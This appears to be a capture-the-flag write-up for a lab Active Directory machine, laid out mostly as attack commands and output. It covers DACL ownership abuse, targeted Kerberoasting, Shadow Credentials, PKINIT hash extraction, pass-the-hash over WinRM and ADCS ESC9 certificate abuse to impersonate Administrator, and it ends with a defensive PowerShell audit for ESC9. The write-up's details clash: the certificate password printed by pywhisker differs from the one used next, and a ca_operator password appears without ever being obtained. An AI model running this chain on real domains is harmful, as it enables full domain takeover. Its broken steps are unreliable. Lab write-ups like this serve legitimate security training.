This machine is an Active Directory environment with multiple misconfigurations: weak user credentials, DACL abuse (WriteOwner → WriteMembers), Shadow Credentials, and an ADCS ESC9 vulnerability. The final compromise is achieved by requesting a certificate with Administrator UPN and extracting the NT hash.
Target: 10.10.11.41
Initial access: judith.mader / judith09
Domain: certified.htb
Techniques: DACL abuse, targeted Kerberoast, Shadow Credentials, PKINIT, ADCS ESC9
NetExec:
$ nxc smb 10.10.11.41 -u "judith.mader" -p 'judith09' --rid-brute
$ nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --users
Users: Administrator, Guest, krbtgt, judith.mader, management_svc, ca_operator, alexander.huges, harry.wilson, gregory.cameron
BloodHound collection:
$ nxc ldap 10.10.11.41 -u judith.mader -p 'judith09' --bloodhound --collection ALL --dns-server 10.10.11.41
-> bloodhound.zip
enum4linux-ng:
NetBIOS: DC01
Domain: CERTIFIED
DNS: certified.htb
BloodHound shows:
judith.mader -> WriteOwner -> MANAGEMENT (Group)
Take ownership of the group:
$ impacket-owneredit -action write -new-owner 'judith.mader' \
    -target 'management' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.10.11.41
Grant WriteMembers to yourself:
$ impacket-dacledit -action write -rights WriteMembers \
    -principal 'judith.mader' \
    -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' \
    'certified.htb'/'judith.mader':'judith09'
Add yourself to the group:
$ net rpc group addmem "MANAGEMENT" "judith.mader" \
    -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41"
Group members now:
CERTIFIED\judith.mader
CERTIFIED\management_svc
MANAGEMENT has GenericWrite over management_svc.
Attempt a targeted Kerberoast (the clock is synced with the DC first so the Kerberos requests are accepted):
$ sudo ntpdate 10.10.11.41
$ targetedKerberoast.py -d certified.htb -u judith.mader -p judith09 --dc-ip 10.10.11.41
-> hash obtained but not crackable
Hashcat exhausted the wordlist. No password recovered.
Add a KeyCredential to management_svc:
$ pywhisker.py -d certified.htb -u judith.mader -p judith09 \
    --target management_svc --action add
-> Saved PFX: GyQadAKv.pfx
-> Password: DR4zJqcY6beffcceYXRQ
Obtain a TGT via PKINIT with the new certificate:
$ gettgtpkinit.py certified.htb/management_svc \
    -cert-pfx GyQadAKv.pfx -pfx-pass DR4zJqcY6beffcce
Extract the NT hash (the -key value is the AS-REP encryption key that gettgtpkinit.py prints):
$ getnthash.py certified.htb/management_svc -key <AS-REP encryption key from gettgtpkinit.py>
-> a091c1832bcdd4677c28b5a6a1295584
This hash allows WinRM as management_svc:
$ evil-winrm -i 10.10.11.41 -u management_svc -H 'a091c1832bcdd4677c28b5a6a1295584'
Find templates:
$ certipy-ad find -username ca_operator@certified.htb -password ca_operator -dc-ip 10.10.11.41
-> ESC9 vulnerability identified
Update the ca_operator UPN to Administrator. Because the template omits the SID security extension (ESC9) and the DC maps the certificate to an account by UPN, a certificate issued to ca_operator with this UPN will be mapped to the Administrator account:
$ certipy-ad account update \
    -username management_svc@certified.htb \
    -hashes a091c1832bcdd4677c28b5a6a1295584 \
    -user ca_operator -upn Administrator
Request certificate using template CertifiedAuthentication:
$ certipy-ad req -username ca_operator@certified.htb -p ca_operator \
    -ca certified-DC01-CA -template CertifiedAuthentication -debug
-> administrator.pfx
Authenticate with the certificate:
$ certipy-ad auth -pfx administrator.pfx -domain certified.htb
-> NT hash: 0d5b49608bbce1751f708748f67e2d34
WinRM as Administrator:
$ evil-winrm -i 10.10.11.41 -u Administrator -H '0d5b49608bbce1751f708748f67e2d34'
-> root.txt
The machine chains several AD misconfigurations: DACL WriteOwner abuse, WriteMembers privilege escalation, Shadow Credentials, PKINIT authentication, and finally ADCS ESC9 to impersonate Administrator. The final certificate request provides a valid Administrator TGT and NT hash, allowing full domain compromise.
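From the defender's side, the ESC9 step only works when the KDC tolerates certificates without the SID security extension and a client-authentication template opts out of that extension. The following audit script is an added example, not part of the writeup or of certipy; it assumes the ActiveDirectory RSAT module and is run on (or with registry access to) the domain controller.

```powershell
# Audit the two ESC9 preconditions: weak certificate mapping on the KDC and
# client-auth templates flagged CT_FLAG_NO_SECURITY_EXTENSION.
Import-Module ActiveDirectory

$NoSecurityExtension = 0x80000              # CT_FLAG_NO_SECURITY_EXTENSION bit
$ClientAuthOid       = '1.3.6.1.5.5.7.3.2'  # Client Authentication EKU

# 1. KDC mapping mode: 2 = full enforcement (certificates without the SID
#    extension are rejected); missing, 0 or 1 = compatibility / weak mapping.
$kdc  = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\Kdc' `
            -Name StrongCertificateBindingEnforcement -ErrorAction SilentlyContinue
$mode = if ($null -eq $kdc) { 'not set (compatibility mode)' }
        else { $kdc.StrongCertificateBindingEnforcement }
Write-Output "StrongCertificateBindingEnforcement: $mode"

# 2. Templates usable for client authentication that omit the SID extension.
$config = (Get-ADRootDSE).configurationNamingContext
$base   = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$config"
$templates = Get-ADObject -SearchBase $base `
    -LDAPFilter '(objectClass=pKICertificateTemplate)' `
    -Properties 'msPKI-Enrollment-Flag','pKIExtendedKeyUsage','msPKI-Certificate-Application-Policy'

foreach ($t in $templates) {
    $flags = [int]$t.'msPKI-Enrollment-Flag'
    # Merge both EKU attributes; an empty EKU list means "any purpose".
    $ekus  = @($t.pKIExtendedKeyUsage) + @($t.'msPKI-Certificate-Application-Policy') |
             Where-Object { $_ }
    $ekus  = @($ekus)
    $clientAuth = ($ekus.Count -eq 0) -or ($ekus -contains $ClientAuthOid)
    if (($flags -band $NoSecurityExtension) -and $clientAuth) {
        Write-Output ("ESC9 candidate: {0} (msPKI-Enrollment-Flag=0x{1:X})" -f $t.Name, $flags)
    }
}
# Remediation: clear the flag on each reported template and set
# StrongCertificateBindingEnforcement to 2 once all issued certificates carry the SID extension.
```

Any template the script reports should also be checked for who holds enrollment rights on it, since ESC9 additionally requires write access over a principal that can enroll.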